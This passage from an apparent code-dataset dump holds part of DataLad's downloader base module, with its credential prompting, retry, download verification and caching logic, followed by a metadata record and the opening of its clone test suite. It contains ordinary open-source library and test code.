auto_repr,\n ensure_unicode,\n unlink,\n)\nfrom .credentials import (\n CompositeCredential,\n)\nfrom datalad.downloaders import CREDENTIAL_TYPES\nfrom ..support.exceptions import (\n AccessDeniedError,\n AccessPermissionExpiredError,\n AnonymousAccessDeniedError,\n CapturedException,\n DownloadError,\n IncompleteDownloadError,\n UnaccountedDownloadError,\n)\nfrom ..support.locking import (\n InterProcessLock,\n try_lock,\n try_lock_informatively,\n)\n\nfrom logging import getLogger\nlgr = getLogger('datalad.downloaders')\n\n\n# TODO: remove headers, HTTP specific\n@auto_repr\nclass DownloaderSession(object):\n \"\"\"Base class to encapsulate information and possibly a session to download the content\n\n The idea is that corresponding downloader provides all necessary\n information and if necessary some kind of session to facilitate\n .download method\n \"\"\"\n\n def __init__(self, size=None, filename=None, url=None, headers=None):\n self.size = size\n self.filename = filename\n self.headers = headers\n self.url = url\n\n def download(self, f=None, pbar=None, size=None):\n raise NotImplementedError(\"must be implemented in subclases\")\n\n # TODO: get_status ?\n\n\n@auto_repr\nclass BaseDownloader(object, metaclass=ABCMeta):\n \"\"\"Base class for the downloaders\"\"\"\n\n _DEFAULT_AUTHENTICATOR = None\n _DOWNLOAD_SIZE_TO_VERIFY_AUTH = 10000\n\n def __init__(self, credential=None, authenticator=None):\n \"\"\"\n\n Parameters\n ----------\n credential: Credential, optional\n Provides necessary credential fields to be used by authenticator\n authenticator: Authenticator, optional\n Authenticator to use for authentication.\n \"\"\"\n if not authenticator and self._DEFAULT_AUTHENTICATOR:\n authenticator = self._DEFAULT_AUTHENTICATOR()\n\n if authenticator and authenticator.requires_authentication:\n if not credential and not authenticator.allows_anonymous:\n msg = \"Both authenticator and credentials must be provided.\" \\\n \" Got only authenticator %s\" % repr(authenticator)\n if ui.yesno(\n title=msg,\n text=\"Do you want to enter %s credentials to be used?\" % authenticator.DEFAULT_CREDENTIAL_TYPE\n ):\n credential = CREDENTIAL_TYPES[authenticator.DEFAULT_CREDENTIAL_TYPE](\n \"session-only-for-%s\" % id(authenticator))\n credential.enter_new()\n # TODO: give an option to store those credentials, and generate a basic provider\n # record?\n else:\n raise ValueError(msg)\n self.credential = credential\n self.authenticator = authenticator\n self._cache = None # for fetches, not downloads\n\n def access(self, method, url, allow_old_session=True, **kwargs):\n \"\"\"Generic decorator to manage access to the URL via some method\n\n Parameters\n ----------\n method : callable\n A callable, usually a method of the same class, which we decorate\n with access handling, and pass url as the first argument\n url : string\n URL to access\n *args, **kwargs\n Passed into the method call\n\n Returns\n -------\n None or bytes\n \"\"\"\n # TODO: possibly wrap this logic outside within a decorator, which\n # would just call the corresponding method\n authenticator = self.authenticator\n if authenticator:\n needs_authentication = authenticator.requires_authentication\n else:\n needs_authentication = self.credential\n\n # TODO: not sure yet, where is/are the right spot(s) to pass the URL:\n if hasattr(self.credential, 'set_context'):\n lgr.debug(\"set credential context as %s\", url)\n self.credential.set_context(auth_url=url)\n\n attempt, incomplete_attempt = 0, 0\n result = None\n credential_was_refreshed = False\n while True:\n attempt += 1\n if attempt > 20:\n # are we stuck in a loop somehow? I think logic doesn't allow this atm\n raise RuntimeError(\"Got to the %d'th iteration while trying to download %s\" % (attempt, url))\n exc_info = None\n msg_types = ''\n supported_auth_types = []\n used_old_session = False\n # Lock must be instantiated here, within each thread to avoid problems\n # when used in our parallel.ProducerConsumer\n # see https://github.com/datalad/datalad/issues/6483\n interp_lock = InterProcessLock(\n op.join(cfg.obtain('datalad.locations.locks'),\n 'downloader-auth.lck')\n )\n\n try:\n # Try to lock since it might desire to ask for credentials, but still allow to time out at 5 minutes\n # while providing informative message on what other process might be holding it.\n with try_lock_informatively(interp_lock, purpose=\"establish download session\", proceed_unlocked=False):\n used_old_session = self._establish_session(url, allow_old=allow_old_session)\n if not allow_old_session:\n assert(not used_old_session)\n lgr.log(5, \"Calling out into %s for %s\", method, url)\n result = method(url, **kwargs)\n # assume success if no puke etc\n break\n except AccessDeniedError as e:\n ce = CapturedException(e)\n if hasattr(e, 'status') and e.status == 429:\n # Too many requests.\n # We can retry by continuing the loop.\n time.sleep(0.5*(attempt**1.2))\n continue\n\n if isinstance(e, AnonymousAccessDeniedError):\n access_denied = \"Anonymous access\"\n else:\n access_denied = \"Access\"\n lgr.debug(\"%s was denied: %s\", access_denied, ce)\n supported_auth_types = e.supported_types\n exc_info = sys.exc_info()\n\n if supported_auth_types:\n msg_types = \\\n \" The failure response indicated that following \" \\\n \"authentication types should be used: %s\" % (\n ', '.join(supported_auth_types))\n # keep inside except https://github.com/datalad/datalad/issues/3621\n # TODO: what if it was anonimous attempt without authentication,\n # so it is not \"requires_authentication\" but rather\n # \"supports_authentication\"? We should not report below in\n # _get_new_credential that authentication has failed then since there\n # were no authentication. We might need a custom exception to\n # be caught above about that\n\n allow_old_session = False # we will either raise or auth\n # in case of parallel downloaders, one would succeed to get the\n # lock, ask user if necessary and other processes would just wait\n # got it to return back\n with try_lock(interp_lock) as got_lock:\n if got_lock:\n if isinstance(e, AccessPermissionExpiredError) \\\n and not credential_was_refreshed \\\n and self.credential \\\n and isinstance(self.credential, CompositeCredential):\n lgr.debug(\"Requesting refresh of the credential (once)\")\n self.credential.refresh()\n # to avoid a loop of refreshes without giving a chance to\n # enter a new one, we will allow only a single refresh\n credential_was_refreshed = True\n else:\n self._handle_authentication(url, needs_authentication, e, ce,\n access_denied, msg_types,\n supported_auth_types,\n used_old_session)\n else:\n lgr.debug(\"The lock for downloader authentication was not available.\")\n # We will just wait for the lock to become available,\n # and redo connect/download attempt\n continue\n\n except IncompleteDownloadError as e:\n ce = CapturedException(e)\n exc_info = sys.exc_info()\n incomplete_attempt += 1\n if incomplete_attempt > 5:\n # give up\n raise\n lgr.debug(\"Failed to download fully, will try again: %s\", ce)\n # TODO: may be fail earlier than after 20 attempts in such a case?\n except DownloadError:\n # TODO Handle some known ones, possibly allow for a few retries, otherwise just let it go!\n raise\n\n return result\n\n def _handle_authentication(self, url, needs_authentication, e, ce,\n access_denied, msg_types, supported_auth_types,\n used_old_session):\n if needs_authentication:\n # so we knew it needs authentication\n if not used_old_session:\n # we did use new cookies, we knew that authentication is needed\n # but still failed. So possible cases:\n # 1. authentication credentials changed/were revoked\n # - allow user to re-enter credentials\n # 2. authentication mechanisms changed\n # - we can't do anything here about that\n # 3. bug in out code which would render\n # authentication/cookie handling\n # ineffective\n # - not sure what to do about it\n if not ui.is_interactive:\n lgr.error(\n \"Interface is non interactive, so we are \"\n \"reraising: %s\", ce)\n raise e\n self._enter_credentials(\n url,\n denied_msg=access_denied,\n auth_types=supported_auth_types,\n new_provider=False)\n else: # None or False\n if needs_authentication is False:\n # those urls must or should NOT require authentication\n # but we got denied\n raise DownloadError(\n \"Failed to download from %s, which must be available\"\n \"without authentication but access was denied. \"\n \"Adjust your configuration for the provider.%s\"\n % (url, msg_types))\n else:\n # how could be None or any other non-False bool(False)\n assert (needs_authentication is None)\n # So we didn't know if authentication necessary, and it\n # seems to be necessary, so Let's ask the user to setup\n # authentication mechanism for this website\n self._enter_credentials(\n url,\n denied_msg=access_denied,\n auth_types=supported_auth_types,\n new_provider=True)\n\n def _setup_new_provider(self, title, url, auth_types=None):\n # Full new provider (TODO move into Providers?)\n from .providers import Providers\n providers = Providers.from_config_files()\n while True:\n provider = providers.enter_new(url, auth_types=auth_types)\n if not provider:\n if ui.yesno(\n title=\"Re-enter provider?\",\n text=\"You haven't entered or saved provider, would you like to retry?\",\n default=True\n ):\n continue\n break\n return provider\n\n def _enter_credentials(\n self, url, denied_msg,\n auth_types=[], new_provider=True):\n \"\"\"Use when authentication fails to set new credentials for url\n\n Raises\n ------\n DownloadError\n If no known credentials type or user refuses to update\n \"\"\"\n title = f\"{denied_msg} to {url} has failed.\"\n\n if new_provider:\n # No credential was known, we need to create an\n # appropriate one\n if not ui.yesno(\n title=title,\n text=\"Would you like to setup a new provider configuration\"\n \" to access url?\",\n default=True\n ):\n assert not self.authenticator, \"bug: incorrect assumption\"\n raise DownloadError(\n title +\n \" No authenticator is known, cannot set any credential\")\n else:\n provider = self._setup_new_provider(\n title, url, auth_types=auth_types)\n self.authenticator = provider.authenticator\n self.credential = provider.credential\n if not (self.credential and self.credential.is_known):\n # TODO: or should we ask to re-enter?\n self.credential.enter_new()\n else:\n action_msg = \"enter other credentials in case they were updated?\"\n\n if self.credential and ui.yesno(\n title=title,\n text=\"Do you want to %s\" % action_msg):\n self.credential.enter_new()\n else:\n raise DownloadError(\n \"Failed to download from %s given available credentials\"\n % url)\n\n lgr.debug(\"set credential context as %s\", url)\n self.credential.set_context(auth_url=url)\n\n @staticmethod\n def _get_temp_download_filename(filepath):\n \"\"\"Given a filepath, return the one to use as temp file during download\n \"\"\"\n # TODO: might better reside somewhere under .datalad/tmp or\n # .git/datalad/tmp\n return filepath + \".datalad-download-temp\"\n\n @abstractmethod\n def get_downloader_session(self, url):\n \"\"\"\n\n Parameters\n ----------\n url : str\n\n Returns\n -------\n downloader_into_fp: callable\n Which takes two parameters: file, pbar\n target_size: int or None (if unknown)\n url: str\n Possibly redirected url\n url_filename: str or None\n Filename as decided from the (redirected) url\n headers : dict or None\n \"\"\"\n raise NotImplementedError(\"Must be implemented in the subclass\")\n\n def _verify_download(self, url, downloaded_size, target_size, file_=None, content=None):\n \"\"\"Verify that download finished correctly\"\"\"\n\n if (self.authenticator\n and downloaded_size < self._DOWNLOAD_SIZE_TO_VERIFY_AUTH) \\\n and hasattr(self.authenticator, 'failure_re') \\\n and self.authenticator.failure_re:\n assert hasattr(self.authenticator, 'check_for_auth_failure'), \\\n \"%s has failure_re defined but no check_for_auth_failure\" \\\n % self.authenticator\n\n if file_:\n # just read bytes and pass to check_for_auth_failure which\n # will then encode regex into bytes (assuming utf-8 though)\n with open(file_, 'rb') as fp:\n content = fp.read(self._DOWNLOAD_SIZE_TO_VERIFY_AUTH)\n else:\n assert(content is not None)\n\n self.authenticator.check_for_auth_failure(\n content, \"Download of the url %s has failed: \" % url)\n\n if target_size and target_size != downloaded_size:\n raise (IncompleteDownloadError if target_size > downloaded_size else UnaccountedDownloadError)(\n \"Downloaded size %d differs from originally announced %d\" % (downloaded_size, target_size))\n\n def _download(self, url, path=None, overwrite=False, size=None, stats=None):\n \"\"\"Download content into a file\n\n Parameters\n ----------\n url: str\n URL to download\n path: str, optional\n Path to file where to store the downloaded content. If None,\n filename deduced from the url and saved in curdir\n size: int, optional\n Limit in size to be downloaded\n\n Returns\n -------\n None or string\n Returns downloaded filename\n\n \"\"\"\n\n downloader_session = self.get_downloader_session(url)\n status = self.get_status_from_headers(downloader_session.headers)\n\n target_size = downloader_session.size\n if size is not None:\n target_size = min(target_size, size)\n\n #### Specific to download\n if path:\n download_dir = op.dirname(path)\n if download_dir:\n os.makedirs(download_dir, exist_ok=True)\n if isdir(path):\n # provided path is a directory under which to save\n filename = downloader_session.filename\n if not filename:\n raise DownloadError(\n \"File name could not be determined from {}\".format(url))\n filepath = opj(path, filename)\n else:\n filepath = path\n else:\n filepath = downloader_session.filename\n\n existed = op.lexists(filepath)\n if existed and not overwrite:\n raise DownloadError(\"Path %s already exists\" % filepath)\n\n # FETCH CONTENT\n # TODO: pbar = ui.get_progressbar(size=response.headers['size'])\n try:\n temp_filepath = self._get_temp_download_filename(filepath)\n if exists(temp_filepath):\n # eventually we might want to continue the download\n lgr.warning(\n \"Temporary file %s from the previous download was found. \"\n \"It will be overridden\" % temp_filepath)\n # TODO. also logic below would clean it up atm\n\n with open(temp_filepath, 'wb') as fp:\n # TODO: url might be a bit too long for the beast.\n # Consider to improve to make it animated as well, or shorten here\n pbar = ui.get_progressbar(label=url, fill_text=filepath, total=target_size)\n t0 = time.time()\n downloader_session.download(fp, pbar, size=size)\n downloaded_time = time.time() - t0\n pbar.finish()\n downloaded_size = os.stat(temp_filepath).st_size\n\n # (headers.get('Content-type', \"\") and headers.get('Content-Type')).startswith('text/html')\n # and self.authenticator.html_form_failure_re: # TODO: use information in authenticator\n self._verify_download(url, downloaded_size, target_size, temp_filepath)\n\n # adjust atime/mtime according to headers/status\n if status.mtime:\n lgr.log(5, \"Setting mtime for %s to be %s\", temp_filepath, status.mtime)\n os.utime(temp_filepath, (time.time(), status.mtime))\n\n # place successfully downloaded over the filepath\n os.replace(temp_filepath, filepath)\n\n if stats:\n stats.downloaded += 1\n stats.overwritten += int(existed)\n stats.downloaded_size += downloaded_size\n stats.downloaded_time += downloaded_time\n except (AccessDeniedError, IncompleteDownloadError) as e:\n raise\n except Exception as e:\n ce = CapturedException(e)\n lgr.error(\"Failed to download %s into %s: %s\", url, filepath, ce)\n raise DownloadError(ce) from e # for now\n finally:\n if exists(temp_filepath):\n # clean up\n lgr.debug(\"Removing a temporary download %s\", temp_filepath)\n unlink(temp_filepath)\n\n return filepath\n\n def download(self, url, path=None, **kwargs):\n \"\"\"Fetch content as pointed by the URL optionally into a file\n\n Parameters\n ----------\n url : string\n URL to access\n path : string, optional\n Filename or existing directory to store downloaded content under.\n If not provided -- deduced from the url\n\n Returns\n -------\n string\n file path\n \"\"\"\n # TODO: may be move all the path dealing logic here\n # but then it might require sending request anyways for Content-Disposition\n # so probably nah\n lgr.info(\"Downloading %r into %r\", url, path)\n return self.access(self._download, url, path=path, **kwargs)\n\n @property\n def cache(self):\n if self._cache is None:\n # TODO: move this all logic outside into a dedicated caching beast\n lgr.info(\"Initializing cache for fetches\")\n import dbm\n # Initiate cache.\n # Very rudimentary caching for now, might fail many ways\n cache_dir = cfg.obtain('datalad.locations.cache')\n if not exists(cache_dir):\n os.makedirs(cache_dir)\n cache_path = opj(cache_dir, 'crawl_cache.dbm')\n self._cache = dbm.open(cache_path, 'c')\n import atexit\n atexit.register(self._cache.close)\n return self._cache\n\n def _fetch(self, url, cache=None, size=None, allow_redirects=True, decode=True):\n \"\"\"Fetch content from a url into a file.\n\n Very similar to _download but lacks any \"file\" management and decodes\n content\n\n Parameters\n ----------\n url: str\n URL to download\n cache: bool, optional\n If None, config is consulted to determine whether results should be\n cached. Cache is operating based on url, so no verification of any\n kind is carried out\n\n Returns\n -------\n bytes, dict\n content, headers\n \"\"\"\n lgr.log(3, \"_fetch(%r, cache=%r, size=%r, allow_redirects=%r)\",\n url, cache, size, allow_redirects)\n if cache is None:\n cache = cfg.obtain('datalad.crawl.cache', default=False)\n\n if cache:\n cache_key = msgpack.dumps(url)\n lgr.debug(\"Loading content for url %s from cache\", url)\n res = self.cache.get(cache_key)\n if res is not None:\n try:\n return msgpack.loads(res, encoding='utf-8')\n except Exception as exc:\n ce = CapturedException(exc)\n lgr.warning(\"Failed to unpack loaded from cache for %s: %s\",\n url, ce)\n\n downloader_session = self.get_downloader_session(url, allow_redirects=allow_redirects)\n\n target_size = downloader_session.size\n if size is not None:\n if size == 0:\n # no download of the content was requested -- just return headers and be done\n return None, downloader_session.headers\n target_size = min(size, target_size)\n\n # FETCH CONTENT\n try:\n # Consider to improve to make it animated as well, or shorten here\n #pbar = ui.get_progressbar(label=url, fill_text=filepath, total=target_size)\n content = downloader_session.download(size=size)\n #pbar.finish()\n downloaded_size = len(content)\n\n # now that we know size based on encoded content, let's decode into string type\n if isinstance(content, bytes) and decode:\n content = ensure_unicode(content)\n # downloaded_size = os.stat(temp_filepath).st_size\n\n self._verify_download(url, downloaded_size, target_size, None, content=content)\n\n except (AccessDeniedError, IncompleteDownloadError) as e:\n raise\n except Exception as e:\n ce = CapturedException(e)\n lgr.error(\"Failed to fetch %s: %s\", url, ce)\n raise DownloadError(ce) from e # for now\n\n if cache:\n # apparently requests' CaseInsensitiveDict is not serialazable\n # TODO: may be we should reuse that type everywhere, to avoid\n # out own handling for case-handling\n self.cache[cache_key] = msgpack.dumps((content, dict(downloader_session.headers)))\n\n return content, downloader_session.headers\n\n def fetch(self, url, **kwargs):\n \"\"\"Fetch and return content (not decoded) as pointed by the URL\n\n Parameters\n ----------\n url : string\n URL to access\n\n Returns\n -------\n bytes\n content\n \"\"\"\n lgr.debug(\"Fetching %r\", url)\n # Do not return headers, just content\n out = self.access(self._fetch, url, **kwargs)\n return out[0]\n\n def get_status(self, url, old_status=None, **kwargs):\n \"\"\"Return status of the url as a dict, None if N/A\n\n Parameters\n ----------\n url : string\n URL to access\n old_status : FileStatus, optional\n Previous status record. If provided, might serve as a shortcut\n to assess if status has changed, and if not -- return the same\n record\n\n Returns\n -------\n dict\n dict-like beast depicting the status of the URL if accessible.\n Returned value should be sufficient to tell if the URL content\n has changed by comparing to previously obtained value.\n If URL is not reachable, None would be returned\n \"\"\"\n return self.access(self._get_status, url, old_status=old_status, **kwargs)\n\n # TODO: borrow from itself... ?\n # @borrowkwargs(BaseDownloader, 'get_status')\n def _get_status(self, url, old_status=None):\n\n # the tricky part is only to make sure that we are getting the target URL\n # and not some page saying to login, that is why we need to fetch some content\n # in those cases, and not just check the headers\n download_size = self._DOWNLOAD_SIZE_TO_VERIFY_AUTH \\\n if self.authenticator \\\n and hasattr(self.authenticator, 'failure_re') \\\n and self.authenticator.failure_re \\\n else 0\n\n _, headers = self._fetch(url, cache=False, size=download_size, decode=False)\n\n # extract from headers information to depict the status of the url\n status = self.get_status_from_headers(headers)\n\n if old_status is not None:\n raise NotImplementedError(\"Do not know yet how to deal with old_status. TODO\")\n\n return status\n\n @classmethod\n @abstractmethod\n def get_status_from_headers(cls, headers):\n raise NotImplementedError(\"Implement in the subclass: %s\" % cls)\n\n def get_target_url(self, url):\n \"\"\"Return url after possible redirections\n\n Parameters\n ----------\n url : string\n URL to access\n\n Returns\n -------\n str\n \"\"\"\n return self.access(self._get_target_url, url)\n\n def _get_target_url(self, url):\n return self.get_downloader_session(url).url\n\n\n#\n# Authenticators XXX might go into authenticators.py\n#\n\nclass Authenticator(object):\n \"\"\"Abstract common class for different types of authentication\n\n Derived classes should get parameterized with options from the config files\n from \"provider:\" sections\n \"\"\"\n requires_authentication = True\n allows_anonymous = False\n # TODO: figure out interface\n\n DEFAULT_CREDENTIAL_TYPE = 'user_password'\n\n def authenticate(self, *args, **kwargs):\n \"\"\"Derived classes will provide specific implementation\n \"\"\"\n if self.requires_authentication:\n raise NotImplementedError(\"Authentication for %s not yet implemented\" % self.__class__)\n\n\nclass NotImplementedAuthenticator(Authenticator):\n pass\n\n\nclass NoneAuthenticator(Authenticator):\n \"\"\"Whenever no authentication is necessary and that is stated explicitly\"\"\"\n requires_authentication = False\n pass\n" }, { "alpha_fraction": 0.6045682430267334, "alphanum_fraction": 0.6107990741729736, "avg_line_length": 37.08613967895508, "blob_id": "889c0151f82f691c705038646d99e1766c3eb7b8", "content_id": "d5fd1b7efedd3cff9d7ae192cd432c5cee2144c9", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 66765, "license_type": "permissive", "max_line_length": 96, "num_lines": 1753, "path": "/datalad/core/distributed/tests/test_clone.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test clone action\n\n\"\"\"\n\nimport logging\nimport os.path as op\nimport stat\nfrom unittest.mock import patch\n\nimport pytest\n\nfrom datalad import consts\nfrom datalad.api import (\n clone,\n create,\n remove,\n)\nfrom datalad.cmd import GitWitlessRunner\nfrom datalad.cmd import WitlessRunner as Runner\nfrom datalad.config import ConfigManager\nfrom datalad.core.distributed.clone_utils import (\n _get_installationpath_from_url,\n decode_source_spec,\n)\nfrom datalad.distribution.dataset import Dataset\nfrom datalad.support.annexrepo import AnnexRepo\nfrom datalad.support.exceptions import IncompleteResultsError\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.gitrepo import GitRepo\nfrom datalad.support.network import get_local_file_url\nfrom datalad.tests.utils_pytest import (\n DEFAULT_BRANCH,\n DEFAULT_REMOTE,\n SkipTest,\n assert_false,\n assert_in,\n assert_in_results,\n assert_message,\n assert_not_in,\n assert_not_is_instance,\n assert_raises,\n assert_repo_status,\n assert_result_count,\n assert_result_values_equal,\n assert_status,\n create_tree,\n eq_,\n get_datasets_topdir,\n has_symlink_capability,\n integration,\n known_failure,\n known_failure_githubci_win,\n known_failure_osx,\n known_failure_windows,\n neq_,\n nok_,\n ok_,\n ok_file_has_content,\n ok_startswith,\n on_travis,\n patch_config,\n serve_path_via_http,\n set_date,\n skip_if,\n skip_if_adjusted_branch,\n skip_if_no_network,\n skip_if_on_windows,\n skip_ssh,\n slow,\n swallow_logs,\n with_sameas_remote,\n with_tempfile,\n with_tree,\n xfail_buggy_annex_info,\n)\nfrom datalad.utils import (\n Path,\n chpwd,\n get_home_envvars,\n on_windows,\n rmtree,\n)\n\n# this is the dataset ID of our test dataset in the main datalad RIA store\ndatalad_store_testds_id = '76b6ca66-36b1-11ea-a2e6-f0d5bf7b5561'\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_invalid_args(path=None, otherpath=None, alienpath=None):\n # source == path\n assert_raises(ValueError, clone, 'Zoidberg', path='Zoidberg')\n assert_raises(ValueError, clone, 'ssh://mars/Zoidberg', path='ssh://mars/Zoidberg')\n\n # \"invalid URL\" is a valid filepath... and since no clone to remote\n # is possible - we can just assume that it is the (legit) file path\n # which is provided, not a URL. So both below should fail as any\n # other clone from a non-existing source and not for the reason of\n # \"invalid something\". Behavior is similar to how Git performs - can\n # clone into a URL-like path.\n\n # install to an \"invalid URL\" path\n res = clone('Zoidberg', path='ssh://mars:Zoidberg', on_failure='ignore',\n result_xfm=None)\n assert_status('error', res)\n\n # install to a \"remote location\" path\n res = clone('Zoidberg', path='ssh://mars/Zoidberg', on_failure='ignore',\n result_xfm=None)\n assert_status('error', res)\n\n # make fake dataset\n ds = create(path)\n assert_raises(IncompleteResultsError, ds.clone, '/higherup.', 'Zoidberg')\n # make real dataset, try to install outside\n ds_target = create(Path(otherpath) / 'target')\n assert_raises(ValueError, ds_target.clone, ds.path, path=ds.path)\n assert_status('error', ds_target.clone(ds.path, path=alienpath,\n on_failure='ignore', result_xfm=None))\n\n\n@integration\n@skip_if_no_network\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_clone_crcns(tdir=None, ds_path=None):\n with chpwd(tdir):\n res = clone('///', path=\"all-nonrecursive\", on_failure='ignore',\n result_xfm=None, return_type='list')\n assert_status('ok', res)\n\n # again, but into existing dataset:\n ds = create(ds_path)\n crcns = ds.clone(\"///crcns\", result_xfm='datasets', return_type='item-or-list')\n ok_(crcns.is_installed())\n eq_(crcns.pathobj, ds.pathobj / \"crcns\")\n assert_in(crcns.path, ds.subdatasets(result_xfm='paths'))\n\n\n@integration\n@skip_if_no_network\n@with_tree(tree={'sub': {}})\ndef test_clone_datasets_root(tdir=None):\n tdir = Path(tdir)\n with chpwd(tdir):\n ds = clone(\"///\")\n ok_(ds.is_installed())\n eq_(ds.pathobj, tdir / get_datasets_topdir())\n\n # do it a second time:\n res = clone(\"///\", on_failure='ignore', result_xfm=None, return_type='list')\n assert_message(\n \"dataset %s was already cloned from '%s'\",\n res)\n assert_status('notneeded', res)\n\n # and a third time into an existing something, that is not a dataset:\n (tdir / 'sub' / 'a_file.txt').write_text(\"something\")\n\n res = clone('///', path=\"sub\", on_failure='ignore', result_xfm=None)\n assert_message(\n 'target path already exists and not empty, refuse to clone into target path',\n res)\n assert_status('error', res)\n\n\n@with_tempfile(mkdir=True)\ndef check_clone_simple_local(src, path):\n origin = Dataset(path)\n\n # now install it somewhere else\n ds = clone(src, path, description='mydummy',\n result_xfm='datasets', return_type='item-or-list')\n eq_(ds.path, path)\n ok_(ds.is_installed())\n if not isinstance(origin.repo, AnnexRepo):\n # this means it is a GitRepo\n ok_(isinstance(origin.repo, GitRepo))\n # stays plain Git repo\n ok_(isinstance(ds.repo, GitRepo))\n ok_(not isinstance(ds.repo, AnnexRepo))\n ok_(GitRepo.is_valid_repo(ds.path))\n eq_(set(ds.repo.get_indexed_files()),\n {'test.dat', 'INFO.txt', '.noannex',\n str(Path('.datalad', 'config'))})\n assert_repo_status(path, annex=False)\n else:\n # must be an annex\n ok_(isinstance(ds.repo, AnnexRepo))\n ok_(AnnexRepo.is_valid_repo(ds.path, allow_noninitialized=False))\n eq_(set(ds.repo.get_indexed_files()),\n {'test.dat',\n 'INFO.txt',\n 'test-annex.dat',\n str(Path('.datalad', 'config')),\n str(Path('.datalad', '.gitattributes')),\n '.gitattributes'})\n assert_repo_status(path, annex=True)\n # no content was installed:\n ok_(not ds.repo.file_has_content('test-annex.dat'))\n uuid_before = ds.repo.uuid\n ok_(uuid_before) # make sure we actually have an uuid\n eq_(ds.repo.get_description(), 'mydummy')\n\n # installing it again, shouldn't matter:\n res = clone(src, path, result_xfm=None, return_type='list')\n assert_result_values_equal(res, 'source_url', [src])\n assert_status('notneeded', res)\n assert_message(\"dataset %s was already cloned from '%s'\", res)\n ok_(ds.is_installed())\n if isinstance(origin.repo, AnnexRepo):\n eq_(uuid_before, ds.repo.uuid)\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_clone_simple_local(src=None, url=None):\n srcobj = Path(src)\n gitds = Dataset(srcobj / 'git').create(annex=False)\n annexds = Dataset(srcobj/ 'annex').create(annex=True)\n (annexds.pathobj / \"test-annex.dat\").write_text('annexed content')\n annexds.save()\n for ds in (gitds, annexds):\n (ds.pathobj / 'test.dat').write_text('content')\n (ds.pathobj / 'INFO.txt').write_text('content2')\n ds.save(to_git=True)\n ds.repo.call_git([\"update-server-info\"])\n check_clone_simple_local(gitds.path)\n check_clone_simple_local(gitds.pathobj)\n check_clone_simple_local(f'{url}git')\n check_clone_simple_local(annexds.path)\n check_clone_simple_local(annexds.pathobj)\n check_clone_simple_local(f'{url}annex')\n\n\n@with_tempfile\ndef check_clone_dataset_from_just_source(url, path):\n with chpwd(path, mkdir=True):\n ds = clone(url, result_xfm='datasets', return_type='item-or-list')\n\n ok_startswith(ds.path, path)\n ok_(ds.is_installed())\n ok_(GitRepo.is_valid_repo(ds.path))\n assert_repo_status(ds.path, annex=None)\n assert_in('INFO.txt', ds.repo.get_indexed_files())\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_clone_dataset_from_just_source(src=None, url=None):\n ds = Dataset(src).create()\n (ds.pathobj / 'INFO.txt').write_text('content')\n ds.save()\n ds.repo.call_git([\"update-server-info\"])\n check_clone_dataset_from_just_source(ds.path)\n check_clone_dataset_from_just_source(ds.pathobj)\n check_clone_dataset_from_just_source(url)\n\n\n# test fails randomly, likely a bug in one of the employed test helpers\n# https://github.com/datalad/datalad/pull/3966#issuecomment-571267932\n@known_failure\n@with_tree(tree={\n 'ds': {'test.txt': 'some'},\n })\n@serve_path_via_http\n@with_tempfile(mkdir=True)\ndef test_clone_dataladri(src=None, topurl=None, path=None):\n # make plain git repo\n ds_path = Path(src) / 'ds'\n gr = GitRepo(ds_path, create=True)\n gr.add('test.txt')\n gr.commit('demo')\n Runner(cwd=gr.path).run(['git', 'update-server-info'])\n # now install it somewhere else\n with patch('datalad.consts.DATASETS_TOPURL', topurl):\n ds = clone('///ds', path, result_xfm='datasets', return_type='item-or-list')\n eq_(ds.path, path)\n assert_repo_status(path, annex=False)\n ok_file_has_content(ds.pathobj / 'test.txt', 'some')\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_clone_isnot_recursive(path_src=None, path_nr=None, path_r=None):\n src = Dataset(path_src).create()\n src.create('subm 1')\n src.create('2')\n\n ds = clone(src, path_nr, result_xfm='datasets', return_type='item-or-list')\n ok_(ds.is_installed())\n # check nothing is unintentionally installed\n subdss = ds.subdatasets(recursive=True)\n assert_result_count(subdss, len(subdss), state='absent')\n # this also means, subdatasets to be listed as absent:\n eq_(set(ds.subdatasets(recursive=True, state='absent', result_xfm='relpaths')),\n {'subm 1', '2'})\n\n\n@skip_if(on_travis) # xfails -- stalls, https://github.com/datalad/datalad/issues/6845\n@with_tempfile\n@with_tempfile\ndef test_clone_into_dataset(source_path=None, top_path=None):\n source = Dataset(source_path).create()\n ds = create(top_path)\n assert_repo_status(ds.path)\n # Note, we test against the produced history in DEFAULT_BRANCH, not what it\n # turns into in an adjusted branch!\n hexsha_before = ds.repo.get_hexsha(DEFAULT_BRANCH)\n subds = ds.clone(source, \"sub\",\n result_xfm='datasets', return_type='item-or-list')\n ok_((subds.pathobj / '.git').is_dir())\n ok_(subds.is_installed())\n assert_in('sub', ds.subdatasets(state='present', result_xfm='relpaths'))\n # sub is clean:\n assert_repo_status(subds.path, annex=None)\n # top is clean:\n assert_repo_status(ds.path, annex=None)\n # source is recorded in .gitmodules:\n sds = ds.subdatasets(\"sub\")\n assert_result_count(sds, 1, action='subdataset')\n eq_(sds[0]['gitmodule_datalad-url'], source.pathobj.as_posix())\n # Clone produced one commit including the addition to .gitmodule:\n commits = list(ds.repo.get_branch_commits_(\n branch=DEFAULT_BRANCH,\n stop=hexsha_before\n ))\n assert_not_in(hexsha_before, commits)\n eq_(len(commits), 1)\n\n # but we could also save while installing and there should be no side-effect\n # of saving any other changes if we state to not auto-save changes\n # Create a dummy change\n create_tree(ds.path, {'dummy.txt': 'buga'})\n assert_repo_status(ds.path, untracked=['dummy.txt'])\n subds_ = ds.clone(source, \"sub2\",\n result_xfm='datasets', return_type='item-or-list')\n eq_(subds_.pathobj, ds.pathobj / \"sub2\") # for paranoid yoh ;)\n assert_repo_status(ds.path, untracked=['dummy.txt'])\n\n # don't do anything to the 